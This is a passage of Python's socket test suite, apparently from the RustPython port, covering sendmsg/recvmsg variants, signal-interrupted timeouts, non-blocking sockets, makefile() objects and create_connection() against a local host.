                              SendrecvmsgConnectionlessBase,
                              ThreadedSocketTestMixin, UDP6TestBase):

    def checkRecvmsgAddress(self, addr1, addr2):
        # Called to compare the received address with the address of
        # the peer, ignoring scope ID (the last element of an IPv6
        # address tuple).
        self.assertEqual(addr1[:-1], addr2[:-1])
# IPv6 UDP variants of the sendmsg()/recvmsg() test classes; each is
# skipped when IPv6 or the required socket method is unavailable.

@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
    pass


@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
    pass


@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
    pass


@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
                                      SendrecvmsgUDP6TestBase):
    pass


@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
                                          RFC3542AncillaryTest,
                                          SendrecvmsgUDP6TestBase):
    pass
# TCP variants of the sendmsg()/recvmsg() test classes.

class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
                             ConnectedStreamTestMixin, TCPTestBase):
    pass


@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
    pass


@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
                     SendrecvmsgTCPTestBase):
    pass


@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                         SendrecvmsgTCPTestBase):
    pass
# SCTP stream variants; skipped on AIX and wherever IPPROTO_SCTP
# sockets cannot be created.

class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
                                    SendrecvmsgConnectedBase,
                                    ConnectedStreamTestMixin, SCTPStreamBase):
    pass


@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
    pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
                            SendrecvmsgSCTPStreamTestBase):

    def testRecvmsgEOF(self):
        # SCTP sockets may sporadically raise ENOTCONN instead of
        # reporting EOF; treat that as a skip rather than a failure.
        try:
            super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
        except OSError as e:
            if e.errno != errno.ENOTCONN:
                raise
            self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                                SendrecvmsgSCTPStreamTestBase):

    def testRecvmsgEOF(self):
        # Same ENOTCONN workaround as RecvmsgSCTPStreamTest above.
        try:
            super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
        except OSError as e:
            if e.errno != errno.ENOTCONN:
                raise
            self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
# Unix-domain stream variants, including the SCM_RIGHTS
# file-descriptor-passing tests.

class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
                                    ConnectedStreamTestMixin, UnixStreamBase):
    pass


@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
    pass


@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
                            SendrecvmsgUnixStreamTestBase):
    pass


@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                                SendrecvmsgUnixStreamTestBase):
    pass


@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
    pass


@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
                                     SendrecvmsgUnixStreamTestBase):
    pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set.  These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.

class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a
    # SIGALRM handler that raises ZeroDivisionError (via 1 / 0), so an
    # interrupted call fails with a distinctive exception; removes the
    # handler on teardown, along with any scheduled alarms.

    def setUp(self):
        super().setUp()
        orig_alrm_handler = signal.signal(signal.SIGALRM,
                                          lambda signum, frame: 1 / 0)
        self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)

    # Timeout for socket operations
    timeout = 4.0

    # Provide setAlarm() method to schedule delivery of SIGALRM after
    # given number of seconds, or cancel it if zero, and an
    # appropriate time value to use.  Use setitimer() if available.
    if hasattr(signal, "setitimer"):
        alarm_time = 0.05

        def setAlarm(self, seconds):
            signal.setitimer(signal.ITIMER_REAL, seconds)
    else:
        # Old systems may deliver the alarm up to one second early
        alarm_time = 2

        def setAlarm(self, seconds):
            signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
                     "Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
    # Test interrupting the recv*() methods with signals when a
    # timeout is set.

    def setUp(self):
        super().setUp()
        self.serv.settimeout(self.timeout)

    def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError
        # (raised by the SIGALRM handler installed in
        # InterruptedTimeoutBase.setUp) when interrupted by a signal.
        # The alarm is always cancelled afterwards, even on failure.
        # (Fixed: the old comment claimed an OSError/EINTR was
        # expected, and the assertRaises result was bound to an
        # unused `cm` variable.)
        try:
            self.setAlarm(self.alarm_time)
            with self.assertRaises(ZeroDivisionError):
                func(*args, **kwargs)
        finally:
            self.setAlarm(0)

    def testInterruptedRecvTimeout(self):
        self.checkInterruptedRecv(self.serv.recv, 1024)

    def testInterruptedRecvIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))

    def testInterruptedRecvfromTimeout(self):
        self.checkInterruptedRecv(self.serv.recvfrom, 1024)

    def testInterruptedRecvfromIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))

    @requireAttrs(socket.socket, "recvmsg")
    def testInterruptedRecvmsgTimeout(self):
        self.checkInterruptedRecv(self.serv.recvmsg, 1024)

    @requireAttrs(socket.socket, "recvmsg_into")
    def testInterruptedRecvmsgIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
                     "Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
                                 ThreadSafeCleanupTestCase,
                                 SocketListeningTestMixin, TCPTestBase):
    # Test interrupting the interruptible send*() methods with signals
    # when a timeout is set.

    def setUp(self):
        super().setUp()
        self.serv_conn = self.newSocket()
        self.addCleanup(self.serv_conn.close)
        # Use a thread to complete the connection, but wait for it to
        # terminate before running the test, so that there is only one
        # thread to accept the signal.
        cli_thread = threading.Thread(target=self.doConnect)
        cli_thread.start()
        self.cli_conn, addr = self.serv.accept()
        self.addCleanup(self.cli_conn.close)
        cli_thread.join()
        self.serv_conn.settimeout(self.timeout)

    def doConnect(self):
        # Connection helper run in the short-lived client thread.
        self.serv_conn.connect(self.serv_addr)

    def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (raised by the SIGALRM handler installed
        # in InterruptedTimeoutBase.setUp) when interrupted by a
        # signal.  The alarm is always cancelled afterwards.
        # (Fixed: the old comment claimed OSError/EINTR was expected,
        # and the assertRaises result was bound to an unused `cm`.)
        try:
            with self.assertRaises(ZeroDivisionError):
                while True:
                    self.setAlarm(self.alarm_time)
                    func(*args, **kwargs)
        finally:
            self.setAlarm(0)

    # Issue #12958: The following tests have problems on OS X prior to 10.7

    @unittest.skip("TODO: RUSTPYTHON, plistlib")
    @support.requires_mac_ver(10, 7)
    def testInterruptedSendTimeout(self):
        self.checkInterruptedSend(self.serv_conn.send, b"a"*512)

    @unittest.skip("TODO: RUSTPYTHON, plistlib")
    @support.requires_mac_ver(10, 7)
    def testInterruptedSendtoTimeout(self):
        # Passing an actual address here as Python's wrapper for
        # sendto() doesn't allow passing a zero-length one; POSIX
        # requires that the address is ignored since the socket is
        # connection-mode, however.
        self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
                                  self.serv_addr)

    @unittest.skip("TODO: RUSTPYTHON, plistlib")
    @support.requires_mac_ver(10, 7)
    @requireAttrs(socket.socket, "sendmsg")
    def testInterruptedSendmsgTimeout(self):
        self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):

    def testClose(self):
        conn, addr = self.serv.accept()
        conn.close()

        # After the server closes its side, the client socket becomes
        # readable and recv() returns b'' (EOF).
        sd = self.cli
        read, write, err = select.select([sd], [], [], 1.0)
        self.assertEqual(read, [sd])
        self.assertEqual(sd.recv(1), b'')

        # Calling close() many times should be safe.
        conn.close()
        conn.close()

    def _testClose(self):
        self.cli.connect((HOST, self.port))
        # Keep the client alive long enough for the server to run its
        # checks.
        time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):

    def __init__(self, methodName='runTest'):
        SocketPairTest.__init__(self, methodName=methodName)

    def _check_defaults(self, sock):
        # socketpair() sockets default to AF_UNIX where available,
        # otherwise AF_INET, with SOCK_STREAM and protocol 0.
        self.assertIsInstance(sock, socket.socket)
        if hasattr(socket, 'AF_UNIX'):
            self.assertEqual(sock.family, socket.AF_UNIX)
        else:
            self.assertEqual(sock.family, socket.AF_INET)
        self.assertEqual(sock.type, socket.SOCK_STREAM)
        self.assertEqual(sock.proto, 0)

    def _testDefaults(self):
        self._check_defaults(self.cli)

    def testDefaults(self):
        self._check_defaults(self.serv)

    def testRecv(self):
        msg = self.serv.recv(1024)
        self.assertEqual(msg, MSG)

    def _testRecv(self):
        self.cli.send(MSG)

    def testSend(self):
        self.serv.send(MSG)

    def _testSend(self):
        msg = self.cli.recv(1024)
        self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
    """Tests for non-blocking TCP sockets: the interaction of
    setblocking()/settimeout() with the underlying O_NONBLOCK flag,
    and non-blocking accept()/recv() behaviour."""

    def __init__(self, methodName='runTest'):
        # Event used to synchronise the server and client threads.
        self.event = threading.Event()
        ThreadedTCPSocketTest.__init__(self, methodName=methodName)

    def assert_sock_timeout(self, sock, timeout):
        # Check both the Python-level timeout and, where fcntl is
        # available, the OS-level blocking flag of the descriptor.
        self.assertEqual(self.serv.gettimeout(), timeout)

        blocking = (timeout != 0.0)
        self.assertEqual(sock.getblocking(), blocking)

        if fcntl is not None:
            # When a Python socket has a non-zero timeout, it's switched
            # internally to a non-blocking mode. Later, sock.sendall(),
            # sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EGAIN on all socket operations. That's how
            # timeouts are enforced.
            fd_blocking = (timeout is None)

            flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
            self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)

    def testSetBlocking(self):
        # Test setblocking() and settimeout() methods
        self.serv.setblocking(True)
        self.assert_sock_timeout(self.serv, None)

        self.serv.setblocking(False)
        self.assert_sock_timeout(self.serv, 0.0)

        self.serv.settimeout(None)
        self.assert_sock_timeout(self.serv, None)

        self.serv.settimeout(0)
        self.assert_sock_timeout(self.serv, 0)

        self.serv.settimeout(10)
        self.assert_sock_timeout(self.serv, 10)

        self.serv.settimeout(0)
        self.assert_sock_timeout(self.serv, 0)

    def _testSetBlocking(self):
        pass

    @support.cpython_only
    def testSetBlocking_overflow(self):
        # Issue 15989
        import _testcapi
        if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
            self.skipTest('needs UINT_MAX < ULONG_MAX')

        self.serv.setblocking(False)
        self.assertEqual(self.serv.gettimeout(), 0.0)

        # A value larger than UINT_MAX must still be treated as true.
        self.serv.setblocking(_testcapi.UINT_MAX + 1)
        self.assertIsNone(self.serv.gettimeout())

    # Client counterpart of testSetBlocking_overflow: same no-op body,
    # also restricted to CPython.
    _testSetBlocking_overflow = support.cpython_only(_testSetBlocking)

    @unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
                         'test needs socket.SOCK_NONBLOCK')
    @support.requires_linux_version(2, 6, 28)
    def testInitNonBlocking(self):
        # create a socket with SOCK_NONBLOCK
        self.serv.close()
        self.serv = socket.socket(socket.AF_INET,
                                  socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
        self.assert_sock_timeout(self.serv, 0)

    def _testInitNonBlocking(self):
        pass

    def testInheritFlagsBlocking(self):
        # bpo-7995: accept() on a listening socket with a timeout and the
        # default timeout is None, the resulting socket must be blocking.
        with socket_setdefaulttimeout(None):
            self.serv.settimeout(10)
            conn, addr = self.serv.accept()
            self.addCleanup(conn.close)
            self.assertIsNone(conn.gettimeout())

    def _testInheritFlagsBlocking(self):
        self.cli.connect((HOST, self.port))

    def testInheritFlagsTimeout(self):
        # bpo-7995: accept() on a listening socket with a timeout and the
        # default timeout is None, the resulting socket must inherit
        # the default timeout.
        default_timeout = 20.0
        with socket_setdefaulttimeout(default_timeout):
            self.serv.settimeout(10)
            conn, addr = self.serv.accept()
            self.addCleanup(conn.close)
            self.assertEqual(conn.gettimeout(), default_timeout)

    def _testInheritFlagsTimeout(self):
        self.cli.connect((HOST, self.port))

    def testAccept(self):
        # Testing non-blocking accept
        self.serv.setblocking(0)

        # connect() didn't start: non-blocking accept() fails
        start_time = time.monotonic()
        with self.assertRaises(BlockingIOError):
            conn, addr = self.serv.accept()
        dt = time.monotonic() - start_time
        # The failed accept() must return immediately, not block.
        self.assertLess(dt, 1.0)

        # Let the client thread connect now.
        self.event.set()

        read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
        if self.serv not in read:
            self.fail("Error trying to do accept after select.")

        # connect() completed: non-blocking accept() doesn't block
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        self.assertIsNone(conn.gettimeout())

    def _testAccept(self):
        # don't connect before event is set to check
        # that non-blocking accept() raises BlockingIOError
        self.event.wait()

        self.cli.connect((HOST, self.port))

    def testRecv(self):
        # Testing non-blocking recv
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        conn.setblocking(0)

        # the server didn't send data yet: non-blocking recv() fails
        with self.assertRaises(BlockingIOError):
            msg = conn.recv(len(MSG))

        # Let the client thread send now.
        self.event.set()

        read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
        if conn not in read:
            self.fail("Error during select call to non-blocking socket.")

        # the server sent data yet: non-blocking recv() doesn't block
        msg = conn.recv(len(MSG))
        self.assertEqual(msg, MSG)

    def _testRecv(self):
        self.cli.connect((HOST, self.port))

        # don't send anything before event is set to check
        # that non-blocking recv() raises BlockingIOError
        self.event.wait()

        # send data: recv() will no longer block
        self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
    """Unit tests for the object returned by socket.makefile()

    self.read_file is the io object returned by makefile() on
    the client connection.  You can read from this file to
    get output from the server.

    self.write_file is the io object returned by makefile() on the
    server connection.  You can write to this file to send output
    to the client.
    """

    bufsize = -1  # Use default buffer size
    encoding = 'utf-8'
    errors = 'strict'
    newline = None

    # Subclasses override these to test text-mode files; see the
    # Unicode*FileObjectClassTestCase classes below.
    read_mode = 'rb'
    read_msg = MSG
    write_mode = 'wb'
    write_msg = MSG

    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def setUp(self):
        # Events used to coordinate the server and client threads in
        # the non-blocking and timeout tests.
        self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
            threading.Event() for i in range(4)]
        SocketConnectedTest.setUp(self)
        self.read_file = self.cli_conn.makefile(
            self.read_mode, self.bufsize,
            encoding = self.encoding,
            errors = self.errors,
            newline = self.newline)

    def tearDown(self):
        self.serv_finished.set()
        self.read_file.close()
        self.assertTrue(self.read_file.closed)
        self.read_file = None
        SocketConnectedTest.tearDown(self)

    def clientSetUp(self):
        SocketConnectedTest.clientSetUp(self)
        self.write_file = self.serv_conn.makefile(
            self.write_mode, self.bufsize,
            encoding = self.encoding,
            errors = self.errors,
            newline = self.newline)

    def clientTearDown(self):
        self.cli_finished.set()
        self.write_file.close()
        self.assertTrue(self.write_file.closed)
        self.write_file = None
        SocketConnectedTest.clientTearDown(self)

    def testReadAfterTimeout(self):
        # Issue #7322: A file object must disallow further reads
        # after a timeout has occurred.
        self.cli_conn.settimeout(1)
        self.read_file.read(3)
        # First read raises a timeout
        self.assertRaises(socket.timeout, self.read_file.read, 1)
        # Second read is disallowed
        with self.assertRaises(OSError) as ctx:
            self.read_file.read(1)
        self.assertIn("cannot read from timed out object", str(ctx.exception))

    def _testReadAfterTimeout(self):
        # Send only 3 bytes so the server's second read times out.
        self.write_file.write(self.write_msg[0:3])
        self.write_file.flush()
        self.serv_finished.wait()

    def testSmallRead(self):
        # Performing small file read test
        first_seg = self.read_file.read(len(self.read_msg)-3)
        second_seg = self.read_file.read(3)
        msg = first_seg + second_seg
        self.assertEqual(msg, self.read_msg)

    def _testSmallRead(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testFullRead(self):
        # read until EOF
        msg = self.read_file.read()
        self.assertEqual(msg, self.read_msg)

    def _testFullRead(self):
        self.write_file.write(self.write_msg)
        # Closing the write side produces EOF for the reader.
        self.write_file.close()

    def testUnbufferedRead(self):
        # Performing unbuffered file read test (one byte at a time)
        buf = type(self.read_msg)()
        while 1:
            char = self.read_file.read(1)
            if not char:
                break
            buf += char
        self.assertEqual(buf, self.read_msg)

    def _testUnbufferedRead(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testReadline(self):
        # Performing file readline test
        line = self.read_file.readline()
        self.assertEqual(line, self.read_msg)

    def _testReadline(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testCloseAfterMakefile(self):
        # The file returned by makefile should keep the socket open.
        self.cli_conn.close()
        # read until EOF
        msg = self.read_file.read()
        self.assertEqual(msg, self.read_msg)

    def _testCloseAfterMakefile(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testMakefileAfterMakefileClose(self):
        # Closing the file object must not close the socket itself.
        self.read_file.close()
        msg = self.cli_conn.recv(len(MSG))
        if isinstance(self.read_msg, str):
            msg = msg.decode()
        self.assertEqual(msg, self.read_msg)

    def _testMakefileAfterMakefileClose(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testClosedAttr(self):
        self.assertTrue(not self.read_file.closed)

    def _testClosedAttr(self):
        self.assertTrue(not self.write_file.closed)

    def testAttributes(self):
        self.assertEqual(self.read_file.mode, self.read_mode)
        self.assertEqual(self.read_file.name, self.cli_conn.fileno())

    def _testAttributes(self):
        self.assertEqual(self.write_file.mode, self.write_mode)
        self.assertEqual(self.write_file.name, self.serv_conn.fileno())

    def testRealClose(self):
        self.read_file.close()
        self.assertRaises(ValueError, self.read_file.fileno)
        self.cli_conn.close()
        self.assertRaises(OSError, self.cli_conn.getsockname)

    def _testRealClose(self):
        pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):

    """Repeat the tests from FileObjectClassTestCase with bufsize==0.

    In this case (and in this case only), it should be possible to
    create a file object, read a line from it, create another file
    object, read another line from it, without loss of data in the
    first file object's buffer.  Note that http.client relies on this
    when reading multiple requests from the same socket."""

    bufsize = 0  # Use unbuffered mode

    def testUnbufferedReadline(self):
        # Read a line, create a new file object, read another line with it
        line = self.read_file.readline()  # first line
        self.assertEqual(line, b"A. " + self.write_msg)  # first line
        self.read_file = self.cli_conn.makefile('rb', 0)
        line = self.read_file.readline()  # second line
        self.assertEqual(line, b"B. " + self.write_msg)  # second line

    def _testUnbufferedReadline(self):
        self.write_file.write(b"A. " + self.write_msg)
        self.write_file.write(b"B. " + self.write_msg)
        self.write_file.flush()

    def testMakefileClose(self):
        # The file returned by makefile should keep the socket open...
        self.cli_conn.close()
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, self.read_msg)
        # ...until the file is itself closed
        self.read_file.close()
        self.assertRaises(OSError, self.cli_conn.recv, 1024)

    def _testMakefileClose(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()

    def testMakefileCloseSocketDestroy(self):
        # Closing the file object must drop its reference to the socket.
        refcount_before = sys.getrefcount(self.cli_conn)
        self.read_file.close()
        refcount_after = sys.getrefcount(self.cli_conn)
        self.assertEqual(refcount_before - 1, refcount_after)

    def _testMakefileCloseSocketDestroy(self):
        pass

    # Non-blocking ops
    # NOTE: to set `read_file` as non-blocking, we must call
    # `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).

    def testSmallReadNonBlocking(self):
        self.cli_conn.setblocking(False)
        # No data yet: non-blocking reads return None.
        self.assertEqual(self.read_file.readinto(bytearray(10)), None)
        self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
        self.evt1.set()
        self.evt2.wait(1.0)
        first_seg = self.read_file.read(len(self.read_msg) - 3)
        if first_seg is None:
            # Data not arrived (can happen under Windows), wait a bit
            time.sleep(0.5)
            first_seg = self.read_file.read(len(self.read_msg) - 3)
        buf = bytearray(10)
        n = self.read_file.readinto(buf)
        self.assertEqual(n, 3)
        msg = first_seg + buf[:n]
        self.assertEqual(msg, self.read_msg)
        # All data consumed: further non-blocking reads return None again.
        self.assertEqual(self.read_file.readinto(bytearray(16)), None)
        self.assertEqual(self.read_file.read(1), None)

    def _testSmallReadNonBlocking(self):
        self.evt1.wait(1.0)
        self.write_file.write(self.write_msg)
        self.write_file.flush()
        self.evt2.set()
        # Avoid closing the socket before the server test has finished,
        # otherwise system recv() will return 0 instead of EWOULDBLOCK.
        self.serv_finished.wait(5.0)

    def testWriteNonBlocking(self):
        self.cli_finished.wait(5.0)
        # The client thread can't skip directly - the SkipTest exception
        # would appear as a failure.
        if self.serv_skipped:
            self.skipTest(self.serv_skipped)

    def _testWriteNonBlocking(self):
        self.serv_skipped = None
        self.serv_conn.setblocking(False)
        # Try to saturate the socket buffer pipe with repeated large writes.
        BIG = b"x" * support.SOCK_MAX_SIZE
        LIMIT = 10
        # The first write() succeeds since a chunk of data can be buffered
        n = self.write_file.write(BIG)
        self.assertGreater(n, 0)
        for i in range(LIMIT):
            n = self.write_file.write(BIG)
            if n is None:
                # Succeeded
                break
            self.assertGreater(n, 0)
        else:
            # Let us know that this test didn't manage to establish
            # the expected conditions. This is not a failure in itself but,
            # if it happens repeatedly, the test should be fixed.
            self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):

    bufsize = 1  # Default-buffered for reading; line-buffered for writing


class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):

    bufsize = 2  # Exercise the buffering code
# Re-run the makefile() tests with text-mode files on the read side,
# the write side, or both.

class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""

    read_mode = 'r'
    read_msg = MSG.decode('utf-8')
    write_mode = 'wb'
    write_msg = MSG
    newline = ''


class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""

    read_mode = 'rb'
    read_msg = MSG
    write_mode = 'w'
    write_msg = MSG.decode('utf-8')
    newline = ''


class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""

    read_mode = 'r'
    read_msg = MSG.decode('utf-8')
    write_mode = 'w'
    write_msg = MSG.decode('utf-8')
    newline = ''
class NetworkConnectionTest(object):
    """Prove network connection."""

    def clientSetUp(self):
        # We're inherited below by BasicTCPTest2, which also inherits
        # BasicTCPTest, which defines self.port referenced below.
        self.cli = socket.create_connection((HOST, self.port))
        self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
    """Tests that NetworkConnection does not break existing TCP functionality.
    """
class NetworkConnectionNoServer(unittest.TestCase):

    class MockSocket(socket.socket):
        # A socket whose connect() always raises socket.timeout, used
        # to exercise create_connection()'s timeout handling.
        def connect(self, *args):
            raise socket.timeout('timed out')

    @contextlib.contextmanager
    def mocked_socket_module(self):
        """Return a socket which times out on connect"""
        old_socket = socket.socket
        socket.socket = self.MockSocket
        try:
            yield
        finally:
            # Always restore the real socket class.
            socket.socket = old_socket

    def test_connect(self):
        port = support.find_unused_port()
        cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.addCleanup(cli.close)
        with self.assertRaises(OSError) as cm:
            cli.connect((HOST, port))
        self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)

    def test_create_connection(self):
        # Issue #9792: errors raised by create_connection() should have
        # a proper errno attribute.
        port = support.find_unused_port()
        with self.assertRaises(OSError) as cm:
            socket.create_connection((HOST, port))

        # Issue #16257: create_connection() calls getaddrinfo() against
        # 'localhost'.  This may result in an IPV6 addr being returned
        # as well as an IPV4 one:
        #   >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
        #   >>> [(2,  2, 0, '', ('127.0.0.1', 41230)),
        #        (26, 2, 0, '', ('::1', 41230, 0, 0))]
        #
        # create_connection() enumerates through all the addresses returned
        # and if it doesn't successfully bind to any of them, it propagates
        # the last exception it encountered.
        #
        # On Solaris, ENETUNREACH is returned in this circumstance instead
        # of ECONNREFUSED.  So, if that errno exists, add it to our list of
        # expected errnos.
        expected_errnos = support.get_socket_conn_refused_errs()
        self.assertIn(cm.exception.errno, expected_errnos)

    def test_create_connection_timeout(self):
        # Issue #9792: create_connection() should not recast timeout errors
        # as generic socket errors.
        with self.mocked_socket_module():
            try:
                socket.create_connection((HOST, 1234))
            except socket.timeout:
                pass
            except OSError as exc:
                if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
                    raise
            else:
                self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
    """Check attributes (family, timeout, source address) of sockets
    returned by socket.create_connection().

    The server-side ``test*`` names are all bound to :meth:`_justAccept`;
    the interesting assertions run in the client thread in the paired
    ``_test*`` methods (see ThreadableTest).
    """

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        # Reserved for _testSourceAddress below.
        self.source_port = support.find_unused_port()

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)

    def _justAccept(self):
        # Minimal server: accept one connection and immediately drop it.
        conn, addr = self.serv.accept()
        conn.close()

    testFamily = _justAccept
    def _testFamily(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30)
        self.addCleanup(self.cli.close)
        # 2 == AF_INET
        self.assertEqual(self.cli.family, 2)

    testSourceAddress = _justAccept
    def _testSourceAddress(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30,
                source_address=('', self.source_port))
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.getsockname()[1], self.source_port)
        # The port number being used is sufficient to show that the bind()
        # call happened.

    testTimeoutDefault = _justAccept
    def _testTimeoutDefault(self):
        # passing no explicit timeout uses socket's global default
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(42)
        try:
            self.cli = socket.create_connection((HOST, self.port))
            self.addCleanup(self.cli.close)
        finally:
